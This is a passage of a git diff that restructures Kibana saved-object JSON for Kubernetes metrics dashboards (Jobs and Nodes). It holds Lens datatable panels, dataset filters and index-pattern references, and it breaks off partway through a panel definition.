- "name": "c73b7420-ce63-4d11-b25e-387c7c76b9f1:f5e0f998-307f-48b5-8a3d-a8ce10058dbd", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "574d76e2-ca20-4c75-9dac-31265a772ba5:indexpattern-datasource-layer-77c778d8-1664-4062-b5ff-7bbc982f49d2", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "574d76e2-ca20-4c75-9dac-31265a772ba5:29baa5ec-91df-42a8-8d21-3c3adaa47202", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "2bb97a71-28ce-428d-99d1-01b1918aebf5:indexpattern-datasource-layer-36fb858f-bcf8-4256-9880-37297f1189ce", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "2bb97a71-28ce-428d-99d1-01b1918aebf5:aee28695-ee4d-4930-9118-c4b39cea9c2c", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "controlGroup_f85be4a4-bc01-41a9-b566-442569777dd4:optionsListDataView", - "type": "index-pattern" + "type": "phrase" + }, + "query": { + "match_phrase": { + "data_stream.dataset": "kubernetes.state_job" + } + } + } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "columns": [ + { + "columnId": "2566280d-0419-4eaa-97e7-f8a6c76da734", + "isTransposed": false + }, + { + "alignment": "right", + "columnId": "70dcbe16-f977-46bb-a8ae-9e0067232d5e", + "isTransposed": false + }, + { + "alignment": "right", + "columnId": "6822f9cc-97ef-41b2-bebb-5444626e2a4f", + "isTransposed": false + } + ], + "layerId": "36fb858f-bcf8-4256-9880-37297f1189ce", + "layerType": "data", + "rowHeight": "single", + "rowHeightLines": 1 + } + }, + "title": "Job Owner Informations [Metrics Kubernetes]", + "type": "lens", + "visualizationType": "lnsDatatable" + }, + "enhancements": {}, + "hidePanelTitles": false }, - { - "id": "metrics-*", - "name": "controlGroup_db907011-1eb3-4ed7-ab48-679727ee08f2:optionsListDataView", - "type": "index-pattern" + "gridData": { + "h": 17, + "i": "2bb97a71-28ce-428d-99d1-01b1918aebf5", + "w": 24, + "x": 24, + "y": 11 }, - { - "id": 
"metrics-*", - "name": "controlGroup_0a0c6dd9-2a6f-4d7a-b4f7-1231987bc460:optionsListDataView", - "type": "index-pattern" - } + "panelIndex": "2bb97a71-28ce-428d-99d1-01b1918aebf5", + "title": "Job Owner Informations [Metrics Kubernetes]", + "type": "lens", + "version": "8.10.2" + } ], - "type": "dashboard", - "typeMigrationVersion": "8.9.0" + "timeRestore": false, + "title": "[Metrics Kubernetes] Jobs", + "version": 1 + }, + "references": [ + { + "id": "metrics-*", + "name": "65805e20-7bb7-43ef-99de-fc56c3de6af2:indexpattern-datasource-layer-9b261d2c-645a-4dca-9229-9d8c52e79b9f", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "65805e20-7bb7-43ef-99de-fc56c3de6af2:e4408339-1fa7-47b3-bac9-d2e7945d989f", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "9ecfd540-d36f-4869-836d-3dd704a6561f:indexpattern-datasource-layer-8da4f091-8450-456a-8496-aab42ef0871a", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "9ecfd540-d36f-4869-836d-3dd704a6561f:25697353-2613-4360-89cc-900c9e265a10", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "c73b7420-ce63-4d11-b25e-387c7c76b9f1:indexpattern-datasource-layer-81a3cd5d-50e5-4e31-b736-000de1673372", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "c73b7420-ce63-4d11-b25e-387c7c76b9f1:f5e0f998-307f-48b5-8a3d-a8ce10058dbd", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "574d76e2-ca20-4c75-9dac-31265a772ba5:indexpattern-datasource-layer-77c778d8-1664-4062-b5ff-7bbc982f49d2", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "574d76e2-ca20-4c75-9dac-31265a772ba5:29baa5ec-91df-42a8-8d21-3c3adaa47202", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "2bb97a71-28ce-428d-99d1-01b1918aebf5:indexpattern-datasource-layer-36fb858f-bcf8-4256-9880-37297f1189ce", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "2bb97a71-28ce-428d-99d1-01b1918aebf5:aee28695-ee4d-4930-9118-c4b39cea9c2c", + 
"type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "controlGroup_f85be4a4-bc01-41a9-b566-442569777dd4:optionsListDataView", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "controlGroup_db907011-1eb3-4ed7-ab48-679727ee08f2:optionsListDataView", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "controlGroup_0a0c6dd9-2a6f-4d7a-b4f7-1231987bc460:optionsListDataView", + "type": "index-pattern" + } + ], + "managed": false, + "coreMigrationVersion": "8.8.0", + "typeMigrationVersion": "8.9.0" } \ No newline at end of file diff --git a/packages/kubernetes/kibana/dashboard/kubernetes-b945b7b0-bcb1-11ec-b64f-7dd6e8e82013.json b/packages/kubernetes/kibana/dashboard/kubernetes-b945b7b0-bcb1-11ec-b64f-7dd6e8e82013.json index b701c197e87..8d406b9414b 100644 --- a/packages/kubernetes/kibana/dashboard/kubernetes-b945b7b0-bcb1-11ec-b64f-7dd6e8e82013.json +++ b/packages/kubernetes/kibana/dashboard/kubernetes-b945b7b0-bcb1-11ec-b64f-7dd6e8e82013.json 
@@ -1,2221 +1,2238 @@ { - "attributes": { - "controlGroupInput": { - "chainingSystem": "HIERARCHICAL", - "controlStyle": "twoLine", - "ignoreParentSettingsJSON": "{\"ignoreFilters\":false,\"ignoreQuery\":false,\"ignoreTimerange\":false,\"ignoreValidations\":false}", - "panelsJSON": "{\"57552b73-992a-46e6-9f21-9e07ca926a83\":{\"order\":0,\"width\":\"medium\",\"grow\":true,\"type\":\"optionsListControl\",\"explicitInput\":{\"fieldName\":\"orchestrator.cluster.name\",\"title\":\"Cluster Name\",\"id\":\"57552b73-992a-46e6-9f21-9e07ca926a83\",\"selectedOptions\":[],\"enhancements\":{}}},\"6c029002-b266-42ef-af36-fdcd73bfadef\":{\"order\":1,\"width\":\"medium\",\"grow\":true,\"type\":\"optionsListControl\",\"explicitInput\":{\"fieldName\":\"kubernetes.node.name\",\"title\":\"Node Name\",\"id\":\"6c029002-b266-42ef-af36-fdcd73bfadef\",\"selectedOptions\":[],\"enhancements\":{}}}}" + "id": "kubernetes-b945b7b0-bcb1-11ec-b64f-7dd6e8e82013", + "type": "dashboard", + "namespaces": [ + "default" + ], + "migrationVersion": { + "dashboard": "8.9.0" + }, + "updated_at": "2024-03-13T10:46:00.096Z", + "created_at": "2024-03-13T10:46:00.096Z", + "version": "WzI1MSwyXQ==", + "attributes": { + "controlGroupInput": { + "controlStyle": "twoLine", + "chainingSystem": "HIERARCHICAL", + "ignoreParentSettingsJSON": "{\"ignoreFilters\":false,\"ignoreQuery\":false,\"ignoreTimerange\":false,\"ignoreValidations\":false}", + "panelsJSON": "{\"57552b73-992a-46e6-9f21-9e07ca926a83\":{\"order\":0,\"width\":\"medium\",\"grow\":true,\"type\":\"optionsListControl\",\"explicitInput\":{\"fieldName\":\"orchestrator.cluster.name\",\"title\":\"Cluster Name\",\"id\":\"57552b73-992a-46e6-9f21-9e07ca926a83\",\"selectedOptions\":[],\"enhancements\":{}}},\"6c029002-b266-42ef-af36-fdcd73bfadef\":{\"order\":1,\"width\":\"medium\",\"grow\":true,\"type\":\"optionsListControl\",\"explicitInput\":{\"fieldName\":\"kubernetes.node.name\",\"title\":\"Node 
Name\",\"id\":\"6c029002-b266-42ef-af36-fdcd73bfadef\",\"selectedOptions\":[],\"enhancements\":{}}}}" + }, + "description": "Metrics about Nodes", + "kibanaSavedObjectMeta": { + "searchSourceJSON": { + "filter": [], + "query": { + "language": "kuery", + "query": "" + } + } + }, + "optionsJSON": { + "hidePanelTitles": false, + "syncColors": false, + "useMargins": true + }, + "panelsJSON": [ + { + "version": "8.9.0", + "type": "visualization", + "gridData": { + "h": 4, + "i": "1d9fa4a6-44fe-489d-be4f-53a2eb02a2d5", + "w": 48, + "x": 0, + "y": 0 }, - "description": "Metrics about Nodes", - "kibanaSavedObjectMeta": { - "searchSourceJSON": { + "panelIndex": "1d9fa4a6-44fe-489d-be4f-53a2eb02a2d5", + "embeddableConfig": { + "enhancements": {}, + "savedVis": { + "data": { + "aggs": [], + "searchSource": { "filter": [], "query": { - "language": "kuery", - "query": "" + "language": "kuery", + "query": "" } - } + } + }, + "description": "", + "params": { + "fontSize": 10, + "markdown": "[Kubernetes Overview](#/view/kubernetes-f4dc26db-1b53-4ea2-a78b-1bfab8ea267c),\n[Kubernetes Nodes](#/view/kubernetes-b945b7b0-bcb1-11ec-b64f-7dd6e8e82013), \n[Kubernetes Pods](#/view/kubernetes-3d4d9290-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes Deployments](#/view/kubernetes-5be46210-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes StatefulSets](#/view/kubernetes-21694370-bcb2-11ec-b64f-7dd6e8e82013), [Kubernetes DaemonSets](#/view/kubernetes-85879010-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes CronJobs](#/view/kubernetes-0a672d50-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes Jobs](#/view/kubernetes-9bf990a0-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes Volumes](#/view/kubernetes-3912d9a0-bcb2-11ec-b64f-7dd6e8e82013), [Kubernetes PV/PVC](#/view/kubernetes-dd081350-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes Services](#/view/kubernetes-ff1b3850-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes API Server](#/view/kubernetes-d3bd9650-0c14-11ed-b760-5d1bccb47f56)", + "openLinksInNewTab": false + }, + "title": "", + "type": 
"markdown", + "uiState": {} + }, + "type": "visualization" }, - "optionsJSON": { - "hidePanelTitles": false, - "syncColors": false, - "useMargins": true + "title": "Kubernetes Dashboards [Metrics Kubernetes]" + }, + { + "version": "8.9.0", + "type": "lens", + "gridData": { + "h": 8, + "i": "c6bb8ec0-dae3-4438-ab76-0bff97321124", + "w": 48, + "x": 0, + "y": 4 }, - "panelsJSON": [ - { - "embeddableConfig": { - "enhancements": {}, - "savedVis": { - "data": { - "aggs": [], - "searchSource": { - "filter": [], - "query": { - "language": "kuery", - "query": "" - } - } + "panelIndex": "c6bb8ec0-dae3-4438-ab76-0bff97321124", + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-4bf1dfdb-7a60-482d-88d4-130d598ac7bb", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "562d314a-8db1-4d85-9fcd-fe3224749cb2", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "4bf1dfdb-7a60-482d-88d4-130d598ac7bb": { + "columnOrder": [ + "d3f3271d-566f-4fe6-9bf1-69a47d59a2be", + "f0a42b6b-873e-41f2-8ce3-e0598cd7ed64", + "17247592-e6aa-4dba-b20d-b0accaf877dc" + ], + "columns": { + "17247592-e6aa-4dba-b20d-b0accaf877dc": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "kubernetes.node.pod.allocatable.total: *" + }, + "isBucketed": false, + "label": "Total Allocatable Pods", + "operationType": "last_value", + "params": { + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "kubernetes.node.pod.allocatable.total" }, - "description": "", - "params": { - "fontSize": 10, - "markdown": "[Kubernetes Overview](#/view/kubernetes-f4dc26db-1b53-4ea2-a78b-1bfab8ea267c),\n[Kubernetes Nodes](#/view/kubernetes-b945b7b0-bcb1-11ec-b64f-7dd6e8e82013), \n[Kubernetes Pods](#/view/kubernetes-3d4d9290-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes 
Deployments](#/view/kubernetes-5be46210-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes StatefulSets](#/view/kubernetes-21694370-bcb2-11ec-b64f-7dd6e8e82013), [Kubernetes DaemonSets](#/view/kubernetes-85879010-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes CronJobs](#/view/kubernetes-0a672d50-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes Jobs](#/view/kubernetes-9bf990a0-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes Volumes](#/view/kubernetes-3912d9a0-bcb2-11ec-b64f-7dd6e8e82013), [Kubernetes PV/PVC](#/view/kubernetes-dd081350-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes Services](#/view/kubernetes-ff1b3850-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes API Server](#/view/kubernetes-d3bd9650-0c14-11ed-b760-5d1bccb47f56)", - "openLinksInNewTab": false + "d3f3271d-566f-4fe6-9bf1-69a47d59a2be": { + "customLabel": true, + "dataType": "string", + "isBucketed": true, + "label": "Node", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderBy": { + "columnId": "f0a42b6b-873e-41f2-8ce3-e0598cd7ed64", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": true, + "parentFormat": { + "id": "terms" + }, + "size": 10 + }, + "scale": "ordinal", + "sourceField": "kubernetes.node.name" }, - "title": "", - "type": "markdown", - "uiState": {} + "f0a42b6b-873e-41f2-8ce3-e0598cd7ed64": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Allocated Pods", + "operationType": "unique_count", + "params": { + "emptyAsNull": true + }, + "scale": "ratio", + "sourceField": "kubernetes.pod.name" + } + }, + "incompleteColumns": {} } - }, - "gridData": { - "h": 4, - "i": "1d9fa4a6-44fe-489d-be4f-53a2eb02a2d5", - "w": 48, - "x": 0, - "y": 0 - }, - "panelIndex": "1d9fa4a6-44fe-489d-be4f-53a2eb02a2d5", - "title": "Kubernetes Dashboards [Metrics Kubernetes]", - "type": "visualization", - "version": "8.6.0-SNAPSHOT" + } + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "index": 
"562d314a-8db1-4d85-9fcd-fe3224749cb2", + "key": "data_stream.dataset", + "negate": false, + "params": [ + "kubernetes.pod", + "kubernetes.state_node" + ], + "type": "phrases", + "value": [ + "kubernetes.pod", + "kubernetes.state_node" + ] + }, + "query": { + "bool": { + "minimum_should_match": 1, + "should": [ + { + "match_phrase": { + "data_stream.dataset": "kubernetes.pod" + } + }, + { + "match_phrase": { + "data_stream.dataset": "kubernetes.state_node" + } + } + ] + } + } + } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "columns": [ + { + "columnId": "d3f3271d-566f-4fe6-9bf1-69a47d59a2be", + "isTransposed": false + }, + { + "columnId": "f0a42b6b-873e-41f2-8ce3-e0598cd7ed64", + "isTransposed": false + }, + { + "columnId": "17247592-e6aa-4dba-b20d-b0accaf877dc", + "isTransposed": false + } + ], + "layerId": "4bf1dfdb-7a60-482d-88d4-130d598ac7bb", + "layerType": "data" + } }, - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-4bf1dfdb-7a60-482d-88d4-130d598ac7bb", - "type": "index-pattern" + "title": "Allocated and Allocatable Pods per Node [Metrics Kubernetes]", + "type": "lens", + "visualizationType": "lnsDatatable" + }, + "enhancements": {}, + "hidePanelTitles": false, + "type": "lens" + }, + "title": "Allocated and Allocatable Pods per Node [Metrics Kubernetes]" + }, + { + "version": "8.9.0", + "type": "lens", + "gridData": { + "h": 8, + "i": "2a2da54b-f923-4b1f-b36c-0b1d283405b9", + "w": 48, + "x": 0, + "y": 12 + }, + "panelIndex": "2a2da54b-f923-4b1f-b36c-0b1d283405b9", + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-28060f62-4880-4b1c-aef2-fe42f9df0c64", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "3a819463-89ca-494a-9d6a-9e600dccf098", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + 
"datasourceStates": { + "formBased": { + "layers": { + "28060f62-4880-4b1c-aef2-fe42f9df0c64": { + "columnOrder": [ + "6efc3318-f2d7-4e8b-ad3c-138a8cf9522d", + "b0d6d768-94b4-4a60-8703-d4e2f7a04df2", + "7ccec911-2e78-4c28-ade7-94447ebb88b2", + "802c8bea-aecf-4d1b-9b54-84d527d1fc18", + "968ccc98-9aab-42e0-9ae1-bb2767d38edb", + "d9dbaa39-4e9e-41a9-b6ce-dbe76d4e865e", + "f17d0cb7-9045-4bc8-a26a-0777b34a90e6", + "f146f523-db5b-4965-8486-615c98de32f7" + ], + "columns": { + "6efc3318-f2d7-4e8b-ad3c-138a8cf9522d": { + "customLabel": true, + "dataType": "string", + "isBucketed": true, + "label": "Node", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderBy": { + "fallback": true, + "type": "alphabetical" }, - { - "id": "metrics-*", - "name": "562d314a-8db1-4d85-9fcd-fe3224749cb2", - "type": "index-pattern" - } - ], - "state": { - "adHocDataViews": {}, - "datasourceStates": { - "formBased": { - "layers": { - "4bf1dfdb-7a60-482d-88d4-130d598ac7bb": { - "columnOrder": [ - "d3f3271d-566f-4fe6-9bf1-69a47d59a2be", - "f0a42b6b-873e-41f2-8ce3-e0598cd7ed64", - "17247592-e6aa-4dba-b20d-b0accaf877dc" - ], - "columns": { - "17247592-e6aa-4dba-b20d-b0accaf877dc": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "kubernetes.node.pod.allocatable.total: *" - }, - "isBucketed": false, - "label": "Total Allocatable Pods", - "operationType": "last_value", - "params": { - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "kubernetes.node.pod.allocatable.total" - }, - "d3f3271d-566f-4fe6-9bf1-69a47d59a2be": { - "customLabel": true, - "dataType": "string", - "isBucketed": true, - "label": "Node", - "operationType": "terms", - "params": { - "missingBucket": false, - "orderBy": { - "columnId": "f0a42b6b-873e-41f2-8ce3-e0598cd7ed64", - "type": "column" - }, - "orderDirection": "desc", - "otherBucket": true, - "parentFormat": { - "id": "terms" - }, - "size": 10 - }, - "scale": "ordinal", - "sourceField": 
"kubernetes.node.name" - }, - "f0a42b6b-873e-41f2-8ce3-e0598cd7ed64": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Allocated Pods", - "operationType": "unique_count", - "params": { - "emptyAsNull": true - }, - "scale": "ratio", - "sourceField": "kubernetes.pod.name" - } - }, - "incompleteColumns": {} - } - } - } + "orderDirection": "asc", + "otherBucket": true, + "parentFormat": { + "id": "terms" }, - "filters": [ - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "index": "562d314a-8db1-4d85-9fcd-fe3224749cb2", - "key": "data_stream.dataset", - "negate": false, - "params": [ - "kubernetes.pod", - "kubernetes.state_node" - ], - "type": "phrases", - "value": [ - "kubernetes.pod", - "kubernetes.state_node" - ] - }, - "query": { - "bool": { - "minimum_should_match": 1, - "should": [ - { - "match_phrase": { - "data_stream.dataset": "kubernetes.pod" - } - }, - { - "match_phrase": { - "data_stream.dataset": "kubernetes.state_node" - } - } - ] - } - } - } - ], - "internalReferences": [], - "query": { - "language": "kuery", - "query": "" - }, - "visualization": { - "columns": [ - { - "columnId": "d3f3271d-566f-4fe6-9bf1-69a47d59a2be", - "isTransposed": false - }, - { - "columnId": "f0a42b6b-873e-41f2-8ce3-e0598cd7ed64", - "isTransposed": false - }, - { - "columnId": "17247592-e6aa-4dba-b20d-b0accaf877dc", - "isTransposed": false - } - ], - "layerId": "4bf1dfdb-7a60-482d-88d4-130d598ac7bb", - "layerType": "data" - } + "size": 10 + }, + "scale": "ordinal", + "sourceField": "kubernetes.node.name" }, - "title": "Allocated and Allocatable Pods per Node [Metrics Kubernetes]", - "type": "lens", - "visualizationType": "lnsDatatable" - }, - "enhancements": {}, - "hidePanelTitles": false - }, - "gridData": { - "h": 8, - "i": "c6bb8ec0-dae3-4438-ab76-0bff97321124", - "w": 48, - "x": 0, - "y": 4 - }, - "panelIndex": "c6bb8ec0-dae3-4438-ab76-0bff97321124", - "title": "Allocated and Allocatable Pods per 
Node [Metrics Kubernetes]", - "type": "lens", - "version": "8.6.0-SNAPSHOT" + "7ccec911-2e78-4c28-ade7-94447ebb88b2": { + "customLabel": true, + "dataType": "string", + "filter": { + "language": "kuery", + "query": "kubernetes.labels.kubernetes_io/os: *" + }, + "isBucketed": false, + "label": "Operating System", + "operationType": "last_value", + "params": { + "sortField": "@timestamp" + }, + "scale": "ordinal", + "sourceField": "kubernetes.labels.kubernetes_io/os" + }, + "802c8bea-aecf-4d1b-9b54-84d527d1fc18": { + "customLabel": true, + "dataType": "string", + "filter": { + "language": "kuery", + "query": "kubernetes.labels.kubernetes_io/hostname: *" + }, + "isBucketed": false, + "label": "Hostname", + "operationType": "last_value", + "params": { + "sortField": "@timestamp" + }, + "scale": "ordinal", + "sourceField": "kubernetes.labels.kubernetes_io/hostname" + }, + "968ccc98-9aab-42e0-9ae1-bb2767d38edb": { + "customLabel": true, + "dataType": "string", + "filter": { + "language": "kuery", + "query": "kubernetes.node.status.ready: *" + }, + "isBucketed": false, + "label": "Ready", + "operationType": "last_value", + "params": { + "sortField": "@timestamp" + }, + "scale": "ordinal", + "sourceField": "kubernetes.node.status.ready" + }, + "b0d6d768-94b4-4a60-8703-d4e2f7a04df2": { + "customLabel": true, + "dataType": "string", + "filter": { + "language": "kuery", + "query": "kubernetes.labels.kubernetes_io/arch: *" + }, + "isBucketed": false, + "label": "Architecture", + "operationType": "last_value", + "params": { + "sortField": "@timestamp" + }, + "scale": "ordinal", + "sourceField": "kubernetes.labels.kubernetes_io/arch" + }, + "d9dbaa39-4e9e-41a9-b6ce-dbe76d4e865e": { + "customLabel": true, + "dataType": "boolean", + "filter": { + "language": "kuery", + "query": "kubernetes.node.status.unschedulable: *" + }, + "isBucketed": false, + "label": "Unschedulable", + "operationType": "last_value", + "params": { + "sortField": "@timestamp" + }, + "scale": "ratio", + 
"sourceField": "kubernetes.node.status.unschedulable" + }, + "f146f523-db5b-4965-8486-615c98de32f7": { + "customLabel": true, + "dataType": "string", + "filter": { + "language": "kuery", + "query": "kubernetes.node.status.memory_pressure: *" + }, + "isBucketed": false, + "label": "Memory Pressure", + "operationType": "last_value", + "params": { + "sortField": "@timestamp" + }, + "scale": "ordinal", + "sourceField": "kubernetes.node.status.memory_pressure" + }, + "f17d0cb7-9045-4bc8-a26a-0777b34a90e6": { + "customLabel": true, + "dataType": "string", + "filter": { + "language": "kuery", + "query": "kubernetes.node.status.disk_pressure: *" + }, + "isBucketed": false, + "label": "Disk Pressure", + "operationType": "last_value", + "params": { + "sortField": "@timestamp" + }, + "scale": "ordinal", + "sourceField": "kubernetes.node.status.disk_pressure" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "index": "3a819463-89ca-494a-9d6a-9e600dccf098", + "key": "data_stream.dataset", + "negate": false, + "params": [ + "kubernetes.node", + "kubernetes.state_node" + ], + "type": "phrases", + "value": [ + "kubernetes.node", + "kubernetes.state_node" + ] + }, + "query": { + "bool": { + "minimum_should_match": 1, + "should": [ + { + "match_phrase": { + "data_stream.dataset": "kubernetes.node" + } + }, + { + "match_phrase": { + "data_stream.dataset": "kubernetes.state_node" + } + } + ] + } + } + } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "columns": [ + { + "columnId": "6efc3318-f2d7-4e8b-ad3c-138a8cf9522d", + "isTransposed": false + }, + { + "columnId": "b0d6d768-94b4-4a60-8703-d4e2f7a04df2", + "isTransposed": false + }, + { + "columnId": "7ccec911-2e78-4c28-ade7-94447ebb88b2", + "isTransposed": false + }, + { + "columnId": "802c8bea-aecf-4d1b-9b54-84d527d1fc18", + "isTransposed": false + }, + { + 
"columnId": "968ccc98-9aab-42e0-9ae1-bb2767d38edb", + "isTransposed": false + }, + { + "columnId": "d9dbaa39-4e9e-41a9-b6ce-dbe76d4e865e", + "isTransposed": false + }, + { + "columnId": "f17d0cb7-9045-4bc8-a26a-0777b34a90e6", + "isTransposed": false + }, + { + "columnId": "f146f523-db5b-4965-8486-615c98de32f7", + "isTransposed": false + } + ], + "layerId": "28060f62-4880-4b1c-aef2-fe42f9df0c64", + "layerType": "data" + } }, - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-28060f62-4880-4b1c-aef2-fe42f9df0c64", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "3a819463-89ca-494a-9d6a-9e600dccf098", - "type": "index-pattern" - } - ], - "state": { - "adHocDataViews": {}, - "datasourceStates": { - "formBased": { - "layers": { - "28060f62-4880-4b1c-aef2-fe42f9df0c64": { - "columnOrder": [ - "6efc3318-f2d7-4e8b-ad3c-138a8cf9522d", - "b0d6d768-94b4-4a60-8703-d4e2f7a04df2", - "7ccec911-2e78-4c28-ade7-94447ebb88b2", - "802c8bea-aecf-4d1b-9b54-84d527d1fc18", - "968ccc98-9aab-42e0-9ae1-bb2767d38edb", - "d9dbaa39-4e9e-41a9-b6ce-dbe76d4e865e", - "f17d0cb7-9045-4bc8-a26a-0777b34a90e6", - "f146f523-db5b-4965-8486-615c98de32f7" - ], - "columns": { - "6efc3318-f2d7-4e8b-ad3c-138a8cf9522d": { - "customLabel": true, - "dataType": "string", - "isBucketed": true, - "label": "Node", - "operationType": "terms", - "params": { - "missingBucket": false, - "orderBy": { - "fallback": true, - "type": "alphabetical" - }, - "orderDirection": "asc", - "otherBucket": true, - "parentFormat": { - "id": "terms" - }, - "size": 10 - }, - "scale": "ordinal", - "sourceField": "kubernetes.node.name" - }, - "7ccec911-2e78-4c28-ade7-94447ebb88b2": { - "customLabel": true, - "dataType": "string", - "filter": { - "language": "kuery", - "query": "kubernetes.labels.kubernetes_io/os: *" - }, - "isBucketed": false, - "label": "Operating System", - "operationType": "last_value", - "params": { - "sortField": 
"@timestamp" - }, - "scale": "ordinal", - "sourceField": "kubernetes.labels.kubernetes_io/os" - }, - "802c8bea-aecf-4d1b-9b54-84d527d1fc18": { - "customLabel": true, - "dataType": "string", - "filter": { - "language": "kuery", - "query": "kubernetes.labels.kubernetes_io/hostname: *" - }, - "isBucketed": false, - "label": "Hostname", - "operationType": "last_value", - "params": { - "sortField": "@timestamp" - }, - "scale": "ordinal", - "sourceField": "kubernetes.labels.kubernetes_io/hostname" - }, - "968ccc98-9aab-42e0-9ae1-bb2767d38edb": { - "customLabel": true, - "dataType": "string", - "filter": { - "language": "kuery", - "query": "kubernetes.node.status.ready: *" - }, - "isBucketed": false, - "label": "Ready", - "operationType": "last_value", - "params": { - "sortField": "@timestamp" - }, - "scale": "ordinal", - "sourceField": "kubernetes.node.status.ready" - }, - "b0d6d768-94b4-4a60-8703-d4e2f7a04df2": { - "customLabel": true, - "dataType": "string", - "filter": { - "language": "kuery", - "query": "kubernetes.labels.kubernetes_io/arch: *" - }, - "isBucketed": false, - "label": "Architecture", - "operationType": "last_value", - "params": { - "sortField": "@timestamp" - }, - "scale": "ordinal", - "sourceField": "kubernetes.labels.kubernetes_io/arch" - }, - "d9dbaa39-4e9e-41a9-b6ce-dbe76d4e865e": { - "customLabel": true, - "dataType": "boolean", - "filter": { - "language": "kuery", - "query": "kubernetes.node.status.unschedulable: *" - }, - "isBucketed": false, - "label": "Unschedulable", - "operationType": "last_value", - "params": { - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "kubernetes.node.status.unschedulable" - }, - "f146f523-db5b-4965-8486-615c98de32f7": { - "customLabel": true, - "dataType": "string", - "filter": { - "language": "kuery", - "query": "kubernetes.node.status.memory_pressure: *" - }, - "isBucketed": false, - "label": "Memory Pressure", - "operationType": "last_value", - "params": { - "sortField": "@timestamp" - }, - 
"scale": "ordinal", - "sourceField": "kubernetes.node.status.memory_pressure" - }, - "f17d0cb7-9045-4bc8-a26a-0777b34a90e6": { - "customLabel": true, - "dataType": "string", - "filter": { - "language": "kuery", - "query": "kubernetes.node.status.disk_pressure: *" - }, - "isBucketed": false, - "label": "Disk Pressure", - "operationType": "last_value", - "params": { - "sortField": "@timestamp" - }, - "scale": "ordinal", - "sourceField": "kubernetes.node.status.disk_pressure" - } - }, - "incompleteColumns": {} - } - } - } + "title": "Node Informations by Labels [Metrics Kubernetes]", + "type": "lens", + "visualizationType": "lnsDatatable" + }, + "enhancements": {}, + "hidePanelTitles": false, + "type": "lens" + }, + "title": "Node Informations by Labels [Metrics Kubernetes]" + }, + { + "version": "8.9.0", + "type": "lens", + "gridData": { + "h": 13, + "i": "f11dcb2d-3850-430c-b365-e925473ffe81", + "w": 24, + "x": 0, + "y": 20 + }, + "panelIndex": "f11dcb2d-3850-430c-b365-e925473ffe81", + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-f04e39cf-1a10-4841-86e3-53c07cb706df", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "53703bad-9449-489b-84bd-35c1c8a8d710", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "f04e39cf-1a10-4841-86e3-53c07cb706df": { + "columnOrder": [ + "cbe72000-6be9-4a2d-aa1a-217370d18882", + "8640f22e-f2dd-42d4-bf83-ce98ee4f75a1", + "55cd4b2d-4bc2-4f06-97c4-0fc31fcfd5af", + 